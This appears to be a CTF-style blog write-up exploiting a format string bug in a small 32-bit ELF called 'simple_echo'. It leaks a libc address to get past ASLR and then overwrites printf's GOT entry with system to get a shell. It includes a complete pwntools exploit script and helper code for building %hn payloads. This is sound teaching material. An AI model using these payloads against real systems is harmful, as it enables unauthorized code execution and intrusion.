About the binary
This binary was sent to me by a friend, who asked whether it could be exploited. He told me that the vulnerability doesn’t seem to be a buffer overflow, and that he hadn’t found any other way to attack it.
Initial Exploration
Let’s see what kind of binary we’re working on.
$ file simple_echo
simple_echo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=208d64568158fab20eff47c6bc1351e3557076d0, not stripped
$ pwn checksec simple_echo
[*] '/path/to/simple_echo'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
It’s nice to see that the binary is dynamically linked and not stripped. That should mean less time spent reversing the binary (hopefully) and more time figuring out the exploit. Also worth noting: with Partial RELRO and no PIE, the GOT is writable and sits at a fixed address.
Reversing the binary
The main function simply calls a function named cat after a call to setvbuf.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  cat();
  return 0;
}
And cat runs in a loop: it reads from stdin into a buffer, then prints the buffer after every read by passing it directly to printf as the format string.
ssize_t cat()
{
  ssize_t result; // eax
  char format[256]; // [esp+Ch] [ebp-10Ch] BYREF
  ssize_t v2; // [esp+10Ch] [ebp-Ch]

  v2 = 0;
  while ( 1 )
  {
    result = read(0, format, 0xFFu);
    v2 = result;
    if ( result <= 0 )
      break;
    format[v2] = 0;
    printf(format);
  }
  return result;
}
As for printf, the call goes through a stub that jumps to whatever address is stored in its GOT entry at 0x804A010. The dynamic linker fills in that entry at runtime, because the implementation of printf lives in libc and is loaded dynamically.
jmp *0x804A010
Strategy
We know how to use printf to peek at values on the stack (with %x or %s) and to write to memory (with %n).
Now with these techniques in mind, we want to have some strategy when writing our exploit.
Fundamental Goal: control where we write with %n, and be able to compute how many characters to print.
Ultimate Goal: Overwrite the address of printf in the GOT so that it points to system instead, which basically turns the program into an interactive shell.
- We can use the buffer used by read. That’s actually plenty of space! We will place the addresses we want to overwrite there, along with the format string payload.
- We need to find where the buffer is on the stack. Recall accessing the nth argument of printf.
- Enter the addresses for the two-byte (half-word) overwrites.
- Compute the number of chars to print for one half of the 4 bytes, then overwrite it.
- Compute the number of chars to print for the other half of the 4 bytes, then overwrite it.
- Any lines entered from here on will be passed to system() instead of printf().
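The counting in the steps above can be sketched as a small standalone function. This is only an illustration under a few assumptions: the helper name build_hn_payload is made up, the two target addresses sit at the very start of the buffer, and the padding uses %c instead of the %x used in the exploit further down, because %c with a width prints exactly that many characters. The value 0xf7e12680 is a hypothetical address for system.

```python
import struct


def build_hn_payload(target, value, first_arg, already_printed=0):
    """Sketch: 32-bit format string writing `value` to `target` via two %hn.

    `first_arg` is the printf argument index at which the start of our
    buffer shows up (hypothetical helper, not part of any library).
    """
    # Two little-endian pointers: low half-word first, then high half-word.
    payload = struct.pack("<II", target, target + 2)
    printed = already_printed + len(payload)

    halves = (
        (first_arg, value & 0xFFFF),              # lower two bytes
        (first_arg + 1, (value >> 16) & 0xFFFF),  # upper two bytes
    )
    for arg, want in halves:
        # %hn stores only the low 16 bits of the running character count,
        # so the padding is computed modulo 0x10000.
        pad = (want - printed) % 0x10000
        if pad:
            payload += b"%%%d$%dc" % (arg, pad)
            printed += pad
        payload += b"%%%d$hn" % arg
    return payload


# Example: printf's GOT slot from this binary, hypothetical system address.
example = build_hn_payload(0x0804A010, 0xF7E12680, 7)
print(example)
```

Because the padding is taken modulo 0x10000, the same code still works when the upper half of the value is smaller than the lower half.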
Defeating Address Space Layout Randomization (ASLR)
Modern systems use address space layout randomization (ASLR) when loading dynamically linked libraries. Because libc is one such library, the addresses of libc functions that we see while debugging are not necessarily the ones we get when we run the binary normally. They get randomized! How can we defeat ASLR to have a consistent exploit?
We still have a good amount of control over the program through the format string vulnerability. In fact, our control is strong enough that we can read where in memory a libc function ended up at runtime. We can then look up the offset of that function in the libc file being loaded and subtract it from the leaked address to get the libc base address. Once we have the base, every other libc function is just the base plus its own offset.
To have a consistent exploit, we leak the libc base address using the format string vulnerability before we proceed to overwriting addresses.
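The arithmetic behind that is short enough to sketch. The function name resolve_in_libc and the leaked address 0xf7d6f170 are made up for illustration; the two offsets are the ones used in the exploit below and will differ on another libc. The page-alignment check is just a sanity test I like to add, on the assumption that a library base is always page aligned.

```python
def resolve_in_libc(leaked_addr, leaked_symbol_offset, wanted_symbol_offset):
    """Sketch: derive the libc base and another symbol's runtime address.

    Hypothetical helper: `leaked_addr` is the runtime address of a libc
    symbol, and both offsets come from the libc file that is loaded.
    """
    base = leaked_addr - leaked_symbol_offset
    # A wrong offset (or a wrong libc) usually shows up as a misaligned base.
    if base & 0xFFF:
        raise ValueError("libc base %#x is not page aligned" % base)
    return base, base + wanted_symbol_offset


# Offsets from this write-up; the leaked value is a hypothetical example.
libc_base, system_addr = resolve_in_libc(0xF7D6F170, 0x0001F170, 0x00049680)
print(hex(libc_base), hex(system_addr))
```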
Exploit code
#!/usr/bin/env python3
from pwn import *
binary = ELF("./simple_echo")
p = binary.process()
# ====== LEAK =======
libc_start_main_reloc = 0x0804a014 # where pointer to libc_start_main is stored
# libc function offsets (these vary with the system's libc; find them yourself)
libc_start_main_offset = 0x0001f170 # for leaking libc address
system_offset = 0x00049680 # our target value

exploit = b""
exploit += p32(libc_start_main_reloc)
exploit += b"%7$4s"

log.info("leaking libc address")
log.info("Leak payload: %s" % repr(exploit))

p.sendline(exploit)
p.recvn(4) # we don't need this (this is just an echo of libc_start_main_reloc)
leak = u32(p.recvn(4)) # get exactly the next four bytes (this is the leaked address)
p.recvline() # the rest is junk to us
libc_base = leak - libc_start_main_offset
log.info("libc is leaked! base address: %s" % hex(libc_base))
# ====== OVERWRITE =======
printf_reloc = 0x0804A010 # this is where we will overwrite
# we can now figure out where system() will be
system = libc_base + system_offset

# for overwriting lower two bytes
# (the two addresses below already account for 8 printed bytes)
lower_half_adjustment = ((system & 0xffff) - 8)

exploit = b""
exploit += p32(printf_reloc)
exploit += p32(printf_reloc + 2)
exploit += b"%7$" + b"%dx" % lower_half_adjustment
exploit += b"%7$hn"

# for overwriting upper two bytes
# (%hn keeps only the low 16 bits of the count, so wrap modulo 0x10000
# in case the upper half is smaller than the lower half)
upper_half_adjustment = ((system >> 16) - lower_half_adjustment - 8) % 0x10000

exploit += b"%8$" + b"%dx" % upper_half_adjustment
exploit += b"%8$hn"
log.info("overwrite payload: %s", repr(exploit))
p.sendline(exploit)
p.recvline()
log.info("overwrite payload sent. getting shell now weeeeee.")
log.info("note: Ctrl+C or Ctrl+D to close")
p.interactive()
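Both payloads above hard-code argument index 7 as the place where the buffer starts. One way to find such an index is to send a marker followed by a run of positional %x specifiers and look for the marker in the echoed output. Here is a minimal sketch of that idea; make_probe and find_offset are hypothetical helper names, and the sample output is simulated rather than captured from the real binary.

```python
import struct


def make_probe(max_args=16, marker=b"AAAA"):
    """Build e.g. b'AAAA.%1$x.%2$x...' to dump the first printf arguments."""
    specs = b".".join(b"%%%d$x" % i for i in range(1, max_args + 1))
    return marker + b"." + specs


def find_offset(output, marker=b"AAAA"):
    """Return the 1-based argument index whose value equals the marker."""
    # The marker is read back as a little-endian 32-bit word printed in hex.
    want = b"%x" % struct.unpack("<I", marker)[0]
    fields = output.strip().split(b".")[1:]  # drop the echoed marker itself
    for index, field in enumerate(fields, 1):
        if field == want:
            return index
    return None


probe = make_probe()
# Simulated echo of a shorter probe, for illustration only.
simulated = b"AAAA.ff.f7fa.0.1.2.3.41414141.2431252e\n"
print(probe, find_offset(simulated))
```

The default probe stays well under the 255 bytes that read accepts, so it fits in a single line of input.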